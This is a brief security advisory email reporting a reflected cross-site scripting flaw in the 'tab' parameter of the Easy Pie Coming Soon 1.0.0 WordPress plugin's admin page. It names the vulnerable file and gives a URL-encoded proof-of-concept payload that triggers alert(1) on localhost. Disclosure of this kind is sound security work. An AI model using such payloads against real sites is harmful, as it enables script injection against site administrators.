Subject: Cross-Site Scripting (XSS) in Easy Pie Coming Soon 1.0.0

Date: Mon, 10 Aug 2015 18:22:26 +0200

Hello,

Plugin: Easy Pie Coming Soon 1.0.0 https://wordpress.org/plugins/easy-pie-coming-soon/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/admin.php?page=easy-pie-coming-soon&tab=[xss]

Vulnerable parameter: tab

Example PHP callstack:

/easy-pie-coming-soon/pages/page-options.php:33

Verification:

http://localhost/wp-admin/admin.php?page=easy-pie-coming-soon&tab=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,